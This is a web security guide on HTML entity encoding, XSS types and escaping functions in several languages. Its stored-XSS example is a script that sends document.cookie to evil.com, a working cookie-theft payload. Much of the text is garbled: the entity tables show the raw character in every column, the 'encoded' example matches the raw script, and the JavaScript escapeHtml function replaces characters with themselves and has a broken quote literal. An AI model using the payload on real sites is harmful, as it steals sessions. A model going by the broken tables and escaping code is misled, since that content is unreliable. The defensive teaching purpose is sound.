HTML Entity Encoding is one of the most fundamental and important defenses in web security. By converting special HTML characters into entity references, it prevents browsers from misinterpreting those characters as HTML tags or JavaScript code, effectively protecting against XSS (Cross-Site Scripting) attacks.
This guide covers HTML encoding principles, entity character references, XSS prevention strategies, and how to correctly use HTML encoding in different contexts.
HTML documents use angle brackets < and > to define tags. When content itself contains these characters, failing to process them causes the browser to mistake them for HTML tags, leading to rendering errors or worse—security vulnerabilities.
HTML encoding represents these special characters through entity references. There are three formats for HTML entities:
&, <, >, etc. (using predefined names)&, <, >, etc. (using Unicode code points)&, <, >, etc.For example, to display the text <script>alert('XSS')</script> on a webpage instead of executing it, you need to encode it as:
<script>alert('XSS')</script>
Five characters in HTML have special meaning and must be encoded in any HTML context:
| Character | Description | Named Entity | Decimal | Hex |
|---|---|---|---|---|
| & | Ampersand (entity start marker) | & | & | & |
| < | Less than (tag start) | < | < | < |
| > | Greater than (tag end) | > | > | > |
| " | Double quote (attribute value) | " | " | " |
| ' | Single quote (attribute value) | ' | ' | ' |
' is not defined in HTML4 but is valid in HTML5 and XML. For maximum compatibility, use ' instead in HTML attributes.
| Character | Description | HTML Entity |
|---|---|---|
| © | Copyright symbol | © |
| ® | Registered trademark | ® |
| ™ | Trademark | ™ |
| € | Euro | € |
| £ | Pound sterling | £ |
| ¥ | Yen/Chinese yuan | ¥ |
| § | Section sign | § |
| ¶ | Pilcrow (paragraph) | ¶ |
| • | Bullet | • |
| … | Ellipsis | … |
| – | En dash | – |
| — | Em dash | — |
| Character | Description | HTML Entity |
|---|---|---|
| ± | Plus-minus sign | ± |
| × | Multiplication sign | × |
| ÷ | Division sign | ÷ |
| ≠ | Not equal to | ≠ |
| ≤ | Less than or equal to | ≤ |
| ≥ | Greater than or equal to | ≥ |
| ∞ | Infinity | ∞ |
| ← | Left arrow | ← |
| → | Right arrow | → |
| ⇐ | Double left arrow | ⇐ |
| ⇒ | Double right arrow | ⇒ |
| Description | HTML Entity | Notes |
|---|---|---|
| Non-breaking space | | Most commonly used space entity |
| Thin space |   | Narrower than a regular space |
| En space |   | Equal to half the font size |
| Em space |   | Equal to the font size |
| Zero-width space | ​ | Invisible, allows line breaks |
| Zero-width non-joiner | ‌ | Prevents ligatures |
XSS (Cross-Site Scripting) is one of the most common web application security vulnerabilities. Attackers inject malicious JavaScript into webpages, and the scripts execute when other users visit the affected page.
1. Stored XSS
Malicious scripts are permanently stored on the target server (e.g., in a database or comment system). When users visit pages containing the malicious content, the script executes automatically. This is the most dangerous type of XSS.
<!-- Content submitted by an attacker in the comments section -->
<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
2. Reflected XSS
Malicious scripts are included in URL parameters, and the server "reflects" them back in the response page. The attacker must trick users into clicking a malicious link.
<!-- URL: https://example.com/search?q=<script>alert(1)</script> -->
<!-- Server returns unencoded content: -->
<p>Search results: <script>alert(1)</script></p>
3. DOM-based XSS
The vulnerability exists entirely on the client side—JavaScript directly inserts untrusted data into the DOM without encoding.
// ❌ Dangerous: directly inserting HTML
document.getElementById('output').innerHTML = userInput;
// ✅ Safe: using textContent
document.getElementById('output').textContent = userInput;
HTML encoding is the core defense against XSS, but you must pay attention to the context. Different HTML contexts require different encoding strategies:
| Context | Characters to Encode | Encoding Method |
|---|---|---|
| HTML content (inside elements) | & < > | HTML entity encoding |
| HTML attribute (double-quoted) | & < > " | HTML entity encoding |
| HTML attribute (single-quoted) | & < > ' | HTML entity encoding |
| URL attribute (href, src) | HTML encode first, then URL encode | Double encoding |
| JavaScript inline | Requires stricter encoding | Avoid; use frameworks instead |
| CSS inline | Special characters | Avoid |
Modern front-end frameworks encode output by default, greatly reducing XSS risk:
{} expressions in JSX automatically HTML-encode. Only dangerouslySetInnerHTML skips encoding.{{ }} interpolation auto-encodes HTML. Use v-html with extra caution.innerHTML, document.write(), dangerouslySetInnerHTML, or v-html to insert user input is the most common source of XSS vulnerabilities. If you must use them, always HTML-encode the content first.
// JavaScript
function escapeHtml(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
// Python
import html
safe = html.escape(user_input, quote=True)
// PHP
$safe = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
// Java
import org.apache.commons.text.StringEscapeUtils;
String safe = StringEscapeUtils.escapeHtml4(userInput);
// Go
import "html"
safe := html.EscapeString(userInput)
These three types of encoding are often confused, but they serve completely different purposes:
| Encoding Type | Format Example | Use Case |
|---|---|---|
| HTML encoding | < > & | Special characters in HTML documents |
| URL encoding | %3C %3E %26 | Special characters in URLs |
| JS encoding | \u003C \u003E | Special characters in JavaScript strings |
| Base64 encoding | PGh0bWw+ | Binary data to text |
Key principle: Only apply the encoding required by the target context. Don't URL-encode first and then HTML-encode, or vice versa. Each encoding corresponds to a specific parsing rule—mixing them causes display errors.
HTML encoding is the cornerstone of web security. Master these key points to effectively defend against the vast majority of XSS attacks:
innerHTML and dangerouslySetInnerHTML